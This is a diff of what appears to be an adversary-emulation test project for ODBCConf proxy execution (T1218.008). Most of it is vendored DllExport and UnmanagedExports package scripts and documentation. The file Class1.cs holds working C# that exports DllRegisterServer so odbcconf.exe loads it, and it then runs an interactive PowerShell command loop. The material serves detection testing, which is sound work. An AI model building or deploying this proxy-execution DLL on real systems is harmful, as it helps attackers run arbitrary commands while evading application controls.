+		}).Length -gt 0;
+	}
+}
+
+function Assert-PlatformTargetOfProject([String] $fullName) {
+	$proj = Get-DllExportMsBuildProjectsByFullName $fullName
+
+	if(!$proj) {
+		return;
+	}
+
+	$platformTarget = $proj.GetPropertyValue('PlatformTarget');
+
+	if(!$platformTarget -or ($platformTarget -ine 'x86' -and $platformTarget -ine 'x64')) {
+		$projectName = [IO.Path]::GetFileNameWithoutExtension($fullName);
+		if(!$platformTarget) {
+			$platformTarget = "has no platform target";
+		} else {
+			$platformTarget = "has a platform target of '$platformTarget'";
+		}
+		Write-Warning "The project '$projectName' $platformTarget. Only x86 or x64 assemblies can export functions."
+		Write-Host ""
+	}
+}
+
+function Set-NoDllExportsForAnyCpu([String] $projectName, [System.Nullable[bool]] $value) {
+    $projects = Get-AllDllExportMsBuildProjects;
+    
+    [String] $asString = $value;
+
+    if($projectName) {
+        $projects = $projects | where { $_.Name -ieq $projectName };
+    }
+    $propertyName = 'NoDllExportsForAnyCpu';
+    
+    $projects = $projects | where { 
+        $_.GetPropertyValue($propertyName) -ine $asString 
+    } | % {
+        $_.SetProperty($propertyName, $asString);
+    }
+}
+
+Export-ModuleMember Set-NoDllExportsForAnyCpu
+
+Export-ModuleMember Remove-OldDllExportFolder
+Export-ModuleMember Remove-OldDllExportFolders
+Export-ModuleMember Get-DllExportMsBuildProjectsByFullName
+Export-ModuleMember Get-AllDllExportMsBuildProjects
+Export-ModuleMember Assert-PlatformTargetOfProject

atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets

@@ -0,0 +1,75 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+
+  <PropertyGroup>
+    <PostBuildEventDependsOn>
+      $(PostBuildEventDependsOn);
+      RGieseckeDllExport
+    </PostBuildEventDependsOn>
+  </PropertyGroup>
+
+  <PropertyGroup>
+    <BuildDependsOn>
+      $(BuildDependsOn);
+      RGieseckeDllExport
+    </BuildDependsOn>
+  </PropertyGroup>
+
+  <UsingTask TaskName="RGiesecke.DllExport.MSBuild.DllExportAppDomainIsolatedTask"
+             AssemblyFile="RGiesecke.DllExport.MSBuild.dll" />
+
+  <Target Name="RGieseckeDllExport"
+          DependsOnTargets="GetFrameworkPaths">
+
+    <!--
+      These properties can still be applied to the task, but upon installation of a 
+      new version of the nuget package, the properties 
+      DllExportAttributeAssemblyName and DllExportAttributeAssemblyName will be removed from the project.
+      So, if you want to provide an alternative attribute name, the you have to name the property in your project file differently.
+      
+      e.g.:
+      DllExportAttributeAssemblyName="$(MyDllExportAttributeAssemblyName)"
+      DllExportAttributeFullName="$(MyDllExportAttributeFullName)"
+    -->
+    <PropertyGroup>
+
+			<!-- Sorry for the weird naming of those 2, but I have to prevent the upgrade from the old template to remove those from your project files -->
+			<DllExportAttributeFullNameProp Condition="'$(DllExportAttributeFullNameProp)' == ''">RGiesecke.DllExport.DllExportAttribute</DllExportAttributeFullNameProp>
+			<DllExportAttributeAssemblyNameProp Condition="'$(DllExportAttributeAssemblyNameProp)' == ''">RGiesecke.DllExport.Metadata</DllExportAttributeAssemblyNameProp>
+
+			<DllExportPlatform Condition="'$(DllExportPlatform)' == ''">$(Platform)</DllExportPlatform>
+			<DllExportPlatformTarget Condition="'$(DllExportPlatformTarget)' == ''">$(PlatformTarget)</DllExportPlatformTarget>
+			<DllExportCpuType Condition="'$(DllExportCpuType)' == ''">$(CpuType)</DllExportCpuType>
+			<DllExportEmitDebugSymbols Condition="'$(DllExportEmitDebugSymbols)' == ''">$(DebugSymbols)</DllExportEmitDebugSymbols>
+			<DllExportLeaveIntermediateFiles Condition="'$(DllExportLeaveIntermediateFiles)' == ''">false</DllExportLeaveIntermediateFiles>
+			<DllExportTimeout Condition="'$(DllExportTimeout)' == ''">$(DllExportTimeout)</DllExportTimeout>
+			<DllExportKeyContainer Condition="'$(DllExportKeyContainer)' == ''">$(KeyContainerName)$(AssemblyKeyContainerName)</DllExportKeyContainer>
+			<DllExportKeyFile Condition="'$(DllExportKeyFile)' == ''">$(KeyOriginatorFile)</DllExportKeyFile>
+			<DllExportProjectDirectory Condition="'$(DllExportProjectDirectory)' == ''">$(MSBuildProjectDirectory)</DllExportProjectDirectory>
+			<DllExportInputFileName Condition="'$(DllExportInputFileName)' == ''">$(TargetPath)</DllExportInputFileName>
+			<DllExportFrameworkPath Condition="'$(DllExportFrameworkPath)' == ''">$(TargetedFrameworkDir);$(TargetFrameworkDirectory)</DllExportFrameworkPath>
+			<DllExportLibToolPath Condition="'$(DllExportLibToolPath)' == ''">$(DevEnvDir)\..\..\VC\bin</DllExportLibToolPath>
+			<DllExportLibToolDllPath Condition="'$(DllExportLibToolDllPath)' == ''">$(DevEnvDir)</DllExportLibToolDllPath>
+			<DllExportTargetFrameworkVersion Condition="'$(DllExportTargetFrameworkVersion)' == ''">$(TargetFrameworkVersion)</DllExportTargetFrameworkVersion>
+			<DllExportSdkPath Condition="'$(DllExportSdkPath)' == ''">$(TargetFrameworkSDKToolsDirectory)</DllExportSdkPath>
+			<DllExportSkipOnAnyCpu Condition="'$(DllExportSkipOnAnyCpu)' == ''">$(NoDllExportsForAnyCpu)</DllExportSkipOnAnyCpu>
+		</PropertyGroup>
+
+		<DllExportAppDomainIsolatedTask Platform="$(DllExportPlatform)"
+                                    PlatformTarget="$(DllExportPlatformTarget)"
+                                    CpuType="$(DllExportCpuType)"
+                                    EmitDebugSymbols="$(DllExportEmitDebugSymbols)"
+                                    LeaveIntermediateFiles="$(DllExportLeaveIntermediateFiles)"
+                                    Timeout="$(DllExportTimeout)"
+                                    KeyContainer="$(DllExportKeyContainer)"
+                                    KeyFile="$(DllExportKeyFile)"
+                                    ProjectDirectory="$(DllExportProjectDirectory)"
+                                    InputFileName="$(DllExportInputFileName)"
+                                    FrameworkPath="$(DllExportFrameworkPath)"
+                                    LibToolPath="$(DllExportLibToolPath)"
+                                    LibToolDllPath="$(DllExportLibToolDllPath)"
+                                    TargetFrameworkVersion="$(DllExportTargetFrameworkVersion)"
+                                    SdkPath="$(DllExportSdkPath)"
+                                    SkipOnAnyCpu="$(DllExportSkipOnAnyCpu)"/>
+  </Target>
+</Project>

atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/init.ps1

@@ -0,0 +1,12 @@
+param($installPath, $toolsPath, $package, $project)
+
+Import-Module (Join-Path $toolsPath DllExportCmdLets.psm1)
+
+if($project) {
+	Assert-PlatformTargetOfProject $project.FullName
+}
+else {
+	Get-AllDllExportMsBuildProjects | % { 
+		Assert-PlatformTargetOfProject $_.FullPath 
+	}
+}

atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/install.ps1

@@ -0,0 +1,52 @@
+param($installPath, $toolsPath, $package, $project)
+
+$targetFileName = 'RGiesecke.DllExport.targets'
+$targetFileName = [IO.Path]::Combine($toolsPath, $targetFileName)
+$targetUri = New-Object Uri -ArgumentList $targetFileName, [UriKind]::Absolute
+
+$msBuildV4Name = 'Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a';
+$msBuildV4 = [System.Reflection.Assembly]::LoadWithPartialName($msBuildV4Name)
+
+if(!$msBuildV4) {
+    throw New-Object System.IO.FileNotFoundException("Could not load $msBuildV4Name.");
+}
+
+$projectCollection = $msBuildV4.GetType('Microsoft.Build.Evaluation.ProjectCollection')
+
+# change the reference to RGiesecke.DllExport.Metadata.dll to not be copied locally
+
+$project.Object.References | ? { 
+	$_.Name -ieq "RGiesecke.DllExport.Metadata" 
+} | % {
+	if($_ | Get-Member | ? {$_.Name -eq "CopyLocal"}){
+		$_.CopyLocal = $false
+	}
+}
+
+$projects =  $projectCollection::GlobalProjectCollection.GetLoadedProjects($project.FullName)
+$projects |  % {
+	$currentProject = $_
+
+	# remove imports of RGiesecke.DllExport.targets from this project 
+	$currentProject.Xml.Imports | ? {
+		return ("RGiesecke.DllExport.targets" -ieq [IO.Path]::GetFileName($_.Project))
+	}  | % {  
+		$currentProject.Xml.RemoveChild($_);
+	}
+
+	# remove the properties DllExportAttributeFullName and DllExportAttributeAssemblyName
+	$currentProject.Xml.Properties | ? {
+		$_.Name -eq "DllExportAttributeFullName" -or $_.Name -eq "DllExportAttributeAssemblyName"
+	} | % {
+		$_.Parent.RemoveChild($_)
+	}
+
+	$projectUri = New-Object Uri -ArgumentList $currentProject.FullPath, [UriKind]::Absolute
+	$relativeUrl = $projectUri.MakeRelative($targetUri)
+	$import = $currentProject.Xml.AddImport($relativeUrl)
+	$import.Condition = "Exists('$relativeUrl')";
+	
+	# remove the old stuff in the DllExports folder from previous versions, (will check that only known files are in it)
+	Remove-OldDllExportFolder $project
+	Assert-PlatformTargetOfProject $project.FullName
+}

atomics/T1218.008/src/odbcconf net.20/packages/UnmanagedExports.1.2.7/tools/uninstall.ps1

@@ -0,0 +1,17 @@
+param($installPath, $toolsPath, $package, $project)
+
+$targetFileName = 'RGiesecke.DllExport.targets'
+$targetFileName = [System.IO.Path]::Combine($toolsPath, $targetFileName)
+$targetUri = New-Object Uri($targetFileName, [UriKind]::Absolute)
+
+$projects = Get-DllExportMsBuildProjectsByFullName($project.FullName)
+
+return $projects |  % {
+	$currentProject = $_
+
+	$currentProject.Xml.Imports | ? {
+		"RGiesecke.DllExport.targets" -ieq [System.IO.Path]::GetFileName($_.Project)
+	}  | % {  
+		$currentProject.Xml.RemoveChild($_)
+	}
+}

atomics/T1218.008/src/odbcconf net.40/Class1.cs

@@ -0,0 +1,75 @@
+//odbcconf.exe /F file.rsp
+
+using System;
+using System.Runtime.InteropServices;
+using System.Collections.ObjectModel;
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+using System.Text;
+using odbc;
+
+public class Test
+{
+
+    [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+    public static bool DllRegisterServer()
+    {
+        while (true)
+        {
+            AllocConsole();
+            IntPtr defaultStdout = new IntPtr(7);
+            IntPtr currentStdout = GetStdHandle(StdOutputHandle);
+            Console.Write("PS >");
+            string x = Console.ReadLine();
+            try
+            {
+                Console.WriteLine(RunPSCommand(x));
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine(e.Message);
+            }
+        }
+        return true;
+    }
+    //Based on Jared Atkinson's And Justin Warner's Work
+    public static string RunPSCommand(string cmd)
+    {
+        //Init stuff
+        Runspace runspace = RunspaceFactory.CreateRunspace();
+        runspace.Open();
+        RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+        Pipeline pipeline = runspace.CreatePipeline();
+
+        //Add commands
+        pipeline.Commands.AddScript(cmd);
+
+        //Prep PS for string output and invoke
+        pipeline.Commands.Add("Out-String");
+        Collection<PSObject> results = pipeline.Invoke();
+        runspace.Close();
+
+        //Convert records to strings
+        StringBuilder stringBuilder = new StringBuilder();
+        foreach (PSObject obj in results)
+        {
+            stringBuilder.Append(obj.ToString().TrimEnd('\r', '\n'));
+        }
+        return stringBuilder.ToString().Trim();
+    }
+
+    public static void RunPSFile(string script)
+    {
+        PowerShell ps = PowerShell.Create();
+        ps.AddScript(script).Invoke();
+    }
+
+    private const UInt32 StdOutputHandle = 0xFFFFFFF5;
+    [DllImport("kernel32.dll")]
+    private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
+    [DllImport("kernel32.dll")]
+    private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
+    [DllImport("kernel32")]
+    static extern bool AllocConsole();
+
+}

atomics/T1218.008/src/odbcconf net.40/Properties/AssemblyInfo.cs

@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("odbc")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("odbc")]
+[assembly: AssemblyCopyright("Copyright ©  2017")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("12614e54-5c05-4278-8f76-f1940f87a352")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]

atomics/T1218.008/src/odbcconf net.40/odbcconf.csproj

@@ -0,0 +1,63 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{12614E54-5C05-4278-8F76-F1940F87A352}</ProjectGuid>
+    <OutputType>Library</OutputType>
+    <AppDesignerFolder>Properties</AppDesignerFolder>
+    <RootNamespace>odbc</RootNamespace>
+    <AssemblyName>odbc</AssemblyName>
+    <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <TargetFrameworkProfile />
+    <DllExportNamespace>odbc</DllExportNamespace>
+    <DllExportDDNSCecil>true</DllExportDDNSCecil>
+    <DllExportOrdinalsBase>1</DllExportOrdinalsBase>
+    <DllExportGenExpLib>false</DllExportGenExpLib>
+    <DllExportOurILAsm>false</DllExportOurILAsm>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <PlatformTarget>x64</PlatformTarget>
+    <Prefer32Bit>false</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <Prefer32Bit>false</Prefer32Bit>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="DllExport, Version=1.5.2.30304, Culture=neutral, PublicKeyToken=8337224c9ad9e356, processorArchitecture=MSIL">
+      <HintPath>packages\DllExport.1.5.2\lib\net20\DllExport.dll</HintPath>
+      <Private>False</Private>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
+      <SpecificVersion>False</SpecificVersion>
+      <HintPath>..\..\..\..\..\..\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0\System.Management.Automation.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.CSharp" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Class1.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="packages.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <Import Project="packages/DllExport.1.5.2/tools/net.r_eg.DllExport.targets" Condition="Exists('packages/DllExport.1.5.2/tools/net.r_eg.DllExport.targets')" />
+</Project>

atomics/T1218.008/src/odbcconf net.40/odbcconf.sln

@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.26228.4
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "odbcconf", "odbcconf.csproj", "{12614E54-5C05-4278-8F76-F1940F87A352}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{12614E54-5C05-4278-8F76-F1940F87A352}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{12614E54-5C05-4278-8F76-F1940F87A352}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{12614E54-5C05-4278-8F76-F1940F87A352}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{12614E54-5C05-4278-8F76-F1940F87A352}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

atomics/T1218.008/src/odbcconf net.40/packages.config

@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<packages>
+  <package id="DllExport" version="1.5.2" targetFramework="net45" />
+</packages>

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/3rd-party.txt

@@ -0,0 +1,16 @@
+DllExport  [ github.com/3F/DllExport ]
+- - - - - - - - - - - - - - - - - - - 
+
+# Third-party software components
+
+## The DllExport includes:
+
+    * CoreCLR / ILAsm / ILDasm [ github.com/3F/coreclr ]
+    * Mono.Cecil [ github.com/jbevain/cecil ]
+    * SDK reference assemblies for PowerShell version 5 [ github.com/PowerShell/ ]
+    
+## Maintenance of this project also includes:
+
+    * vsSolutionBuildEvent /+ CI.MSBuild [ github.com/3F/vsSolutionBuildEvent ]
+    * GetNuTool [ github.com/3F/GetNuTool ]
+

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/License.txt

@@ -0,0 +1,22 @@
+The MIT License (MIT)
+
+Copyright (c) 2009-2015  Robert Giesecke
+Copyright (c) 2016-2017  Denis Kuzmin <entry.reg@gmail.com>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in
+all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
+THE SOFTWARE.

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/Readme.md

@@ -0,0 +1,188 @@
+# [DllExport](https://github.com/3F/DllExport)
+
+*Unmanaged Exports ( .NET DllExport )*
+
+```
+Copyright (c) 2009-2015  Robert Giesecke
+Copyright (c) 2016-2017  Denis Kuzmin <entry.reg@gmail.com>
+```
+
+[![Build status](https://ci.appveyor.com/api/projects/status/yh1pnuhaqk8h334h/branch/master?svg=true)](https://ci.appveyor.com/project/3Fs/dllexport/branch/master)
+[![NuGet package](https://img.shields.io/nuget/v/DllExport.svg)](https://www.nuget.org/packages/DllExport/) 
+[![License](https://img.shields.io/badge/License-MIT-74A5C2.svg)](https://github.com/3F/DllExport/blob/master/LICENSE)
+
+
+```csharp
+[DllExport("Init", CallingConvention.Cdecl)]
+public static int entrypoint(IntPtr L)
+{
+    // ... it will be called from Lua script
+
+    lua_pushcclosure(L, onProc, 0);
+    lua_setglobal(L, "onKeyDown");
+
+    return 0;
+}
+```
+
+* **For work with Unmanaged code/libraries (binding between .NET and C/C++ etc.), see [Conari](https://github.com/3F/Conari)**
+* If you need convenient work with Lua (5.1, 5.2, 5.3, ...), see [LunaRoad](https://github.com/3F/LunaRoad)
+
+```csharp
+[DllExport("Init", CallingConvention.Cdecl)]
+// __cdecl is the default calling convention for our library as and for C and C++ programs
+[DllExport(CallingConvention.StdCall)]
+[DllExport("MyFunc")]
+[DllExport]
+```
+
+Support of Modules: Library (**.dll**) and Executable (**.exe**) [[?](https://github.com/3F/DllExport/issues/18)]
+
+
+Where to look ? v1.2+ provides dynamic definitions of namespaces (ddNS feature), thus you can use what you want - details **[here](https://github.com/3F/DllExport/issues/2)**
+
+```cpp
+    Via Cecil or direct modification:
+
+    Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
+
+    000005B0                 00 C4 7B 01 00 00 00 2F 00 12 05       .Ä{..../...
+    000005C0  00 00 02 00 00 00 00 00 00 00 00 00 00 00 26 00  ..............&.
+    000005D0  20 02 00 00 00 00 00 00 00 49 2E 77 61 6E 74 2E   ........I.want.   <<<-
+    000005E0  74 6F 2E 66 6C 79 00 00 00 00 00 00 00 00 00 00  to.fly..........  <<<-
+```
+
+[![](https://raw.githubusercontent.com/3F/DllExport/master/Resources/img/DllExport.png)](#)
+[![](https://raw.githubusercontent.com/3F/DllExport/master/Resources/img/DllExport_ordinals.png)](https://github.com/3F/DllExport/issues/11#issuecomment-250907940)
+
+----
+
+
+[Initially](https://github.com/3F/DllExport/issues/3) the original tool `UnmanagedExports` was distributed by Robert Giesecke as an closed-source tool **under the [MIT License](https://opensource.org/licenses/mit-license.php)**:
+
+* [Official page](https://sites.google.com/site/robertgiesecke/Home/uploads/unmanagedexports) - *posted Jul 9, 2009 [ updated Dec 19, 2012 ]*
+* [Official NuGet Packages](https://www.nuget.org/packages/UnmanagedExports) 
+
+Now, we will be more open ! all details [here](https://github.com/3F/DllExport/issues/3)
+
+## License
+
+It still under the [MIT License (MIT)](https://github.com/3F/DllExport/blob/master/LICENSE) - be a ~free~ and open
+
+## &
+
+### How it works
+
+Current features has been implemented through [ILDasm](https://github.com/3F/coreclr/tree/master/src/ildasm) & [ILAsm](https://github.com/3F/coreclr/tree/master/src/ilasm) that does the all required steps via `.export` directive.
+
+**What inside ? or how works the .export directive ?**
+
+Read about format PE32/PE32+, start with grammar from asmparse and move to writer:
+
+```cpp
+...
+if(PASM->m_pCurMethod->m_dwExportOrdinal == 0xFFFFFFFF)
+{
+  PASM->m_pCurMethod->m_dwExportOrdinal = $3;
+  PASM->m_pCurMethod->m_szExportAlias = $6;
+  if(PASM->m_pCurMethod->m_wVTEntry == 0) PASM->m_pCurMethod->m_wVTEntry = 1;
+  if(PASM->m_pCurMethod->m_wVTSlot  == 0) PASM->m_pCurMethod->m_wVTSlot = $3 + 0x8000;
+}
+...
+EATEntry*   pEATE = new EATEntry;
+pEATE->dwOrdinal = pMD->m_dwExportOrdinal;
+pEATE->szAlias = pMD->m_szExportAlias ? pMD->m_szExportAlias : pMD->m_szName;
+pEATE->dwStubRVA = EmitExportStub(pGlobalLabel->m_GlobalOffset+dwDelta);
+m_EATList.PUSH(pEATE);
+...
+// logic of definition of records into EXPORT_DIRECTORY (see details from PE format)
+HRESULT Assembler::CreateExportDirectory()  
+{
+...
+    IMAGE_EXPORT_DIRECTORY  exportDirIDD;
+    DWORD                   exportDirDataSize;
+    BYTE                   *exportDirData;
+    EATEntry               *pEATE;
+    unsigned                i, L, ordBase = 0xFFFFFFFF, Ldllname;
+    ...
+    ~ now we're ready to miracles ~
+```
+
+or read my short explanations from here: [DllMain & the export-table](https://github.com/3F/DllExport/issues/5#issuecomment-240697109); [DllExport.dll](https://github.com/3F/DllExport/issues/28#issuecomment-281957212); [.exp & .lib](https://github.com/3F/DllExport/issues/9#issuecomment-246189220); [ordinals](https://github.com/3F/DllExport/issues/8#issuecomment-245228065) ...
+
+### How to get DllExport
+
+Available variants:
+
+* NuGet PM: `Install-Package DllExport`
+* [GetNuTool](https://github.com/3F/GetNuTool): `msbuild gnt.core /p:ngpackages="DllExport"` or [gnt](https://github.com/3F/GetNuTool/releases/download/v1.5/gnt.bat) /p:ngpackages="DllExport"
+* NuGet Commandline: `nuget install DllExport`
+* [/releases](https://github.com/3F/DllExport/releases) ( [latest](https://github.com/3F/DllExport/releases/latest) )
+* [Nightly builds](https://ci.appveyor.com/project/3Fs/dllexport/history) (`/artifacts` page). But remember: It can be unstable or not work at all. Use this for tests of latest changes.
+
+### How to Build
+
+No requires additional steps for you, just build as you need.
+
+Use build.bat if you need final NuGet package as a `DllExport.<version>.nupkg` etc.
+* *You do not need to do anything inside IDE if you have installed [this plugin](https://visualstudiogallery.msdn.microsoft.com/0d1dbfd7-ed8a-40af-ae39-281bfeca2334/).*
+
+
+### How to Debug
+
+For example, find the DllExport.MSBuild project in solution:
+
+* `Properties` > `Debug`:
+    * `Start Action`: set as `Start External program`
+        * Add full path to **msbuild.exe**, for example: C:\Program Files (x86)\MSBuild\14.0\Bin\MSBuild.exe
+    * `Start Options` > `Command line arguments` write for example:
+
+```bash
+"<path_to_SolutionFile_for_debugging>.sln" /t:Build /p:Configuration=<Configuration>
+```
+
+use additional `Diagnostic` key to msbuild if you need details from .targets
+```bash
+"<path_to_SolutionFile_for_debugging>.sln" /verbosity:Diagnostic /t:Rebuild /p:Configuration=<Configuration>
+```
+
+Go to `Start Debugging`. Now you can debug at runtime.
+
+### coreclr - ILAsm / ILDasm
+
+We use **our custom versions of coreclr**, special for DllExport project - https://github.com/3F/coreclr
+
+This helps to avoid some problems ([like this](https://github.com/3F/DllExport/issues/17)) and more...
+
+*To build minimal version (means that it does not include all components as for original coreclr repo):*
+
+* Restore git submodule or use repo: https://github.com/3F/coreclr.git
+
+```bash
+git submodule update --init --recursive
+```
+
+*Make sure that you have installed [CMake](https://cmake.org/download/), then build simply:*
+
+```bash
+build_s all x86 x64 Release
+build_s x86 Release
+```
+
+or use
+```bash
+build_coreclr_x86.cmd
+build_coreclr_x86_x64.cmd
+```
+
+*You can also use our binaries of coreclr separately if needed:*
+
+* [![NuGet package](https://img.shields.io/nuget/v/ILAsm.svg)](https://www.nuget.org/packages/ILAsm/)
+* Look also [here](https://github.com/3F/coreclr/issues/1)
+
+-------------
+
+**Support ?**
+
+[just a note again...](https://plus.google.com/101239554716569212042/posts/6yP64gDyum1)
+*I mentioned earlier that DllExport is not priority for me (current impl.) "- I will do something from current tasks, but guys, please support it with me" and... why so many support from me o_o*

atomics/T1218.008/src/odbcconf net.40/packages/DllExport.1.5.2/changelog.txt

@@ -0,0 +1,80 @@
+DllExport - github.com/3F/DllExport
+- - - - - - - - - - - - - - - - - - 
+
+[v1.5.2] 2017.03.13
+    
+    * FIXED: Failing to compile in VS2017. Issue #29
+             `Error The "DllExportAppDomainIsolatedTask" task failed unexpectedly. System.ArgumentException: Requested value 'Version46' was not found.`
+             
+    * FIXED: Possible error `Could not load file or assembly Microsoft.Build.Utilities or one of its dependencies.`
+    * CHANGED: Updated script for loading of the Configurator to avoid problem with old assemblies. Issue #22
+    
+[v1.5.1] 2016.11.12
+
+    * FIXED: Error : Invalid Option: /CVRES= Issue #20
+    * NOTE: Our coreclr version was compiled with MSVC 14.0. Related Issue #21
+
+[v1.5] 2016.11.04
+
+    * FIXED: Fixed problem with white-space chars in path: `Cannot find path '<any full path with spaces>' because it does not exist ...`
+    * FIXED: Fixed typo with fullseq (ddNS) - incorrect `0x30 0x30` ~0x007A7-0x007A8  /details in #14
+    * FIXED: Possible problem with NullReferenceException when removing package.
+    * FIXED: Fixed problem with old NS data when we try to install package for project A, then for project B
+    * NEW: Implemented 'Generate .exp + .lib via MS Library Manager' #9
+           GUI Configurator + MSBuild property: `DllExportGenExpLib`
+           
+    * NEW: Added support of unmanaged-export for Executable Modules (.exe) #18
+    * NEW: Cecil variant for ddNS features /#14, #2
+    * NEW: Added our custom IL Assembler as option to fix incorrect 0x13 / 0x11 opcodes. #17
+           GUI Configurator + MSBuild property: `DllExportOurILAsm`
+           It should help for users of Fody projects, etc.
+           https://github.com/Fody/Fody/issues/271
+           
+           IlAsm 4.5.1 https://github.com/3F/coreclr
+           based on 4.5.22220.0 / coreclr 1.0.4
+           changelog of our coreclr for this release: https://github.com/3F/coreclr/blob/master/changelog.txt
+           
+    * CHANGED: Updated scripts of installing/removing package for more correct loading of our assemblies.
+
+[v1.4] 2016.10.05
+
+    * FIXED: Fixed bug - `An item with the same key has already been added`. Issue #10
+    * FIXED: Bug with Meta library: Incorrect default values. Issue #16
+             please note, the __cdecl is the default calling convention for our library 
+             as and for C and C++ programs.
+
+    * FIXED?: Probably fixed bug - `Script errors on package install` Issue #6
+    * FIXED?: Probably fixed bug - `non-English system language - syntax error` Issue #7
+    * NEW: GUI Configurator with updated ddNS features.
+    * NEW: Implemented feature 'Export for platform': [ x86 / x64 / x86 + x64 ] Issue #9
+    * NEW: Implemented feature 'Base for ordinals'. Issue #11
+           There is also alternative to configure this number - MSBuild property: DllExportOrdinalsBase
+         
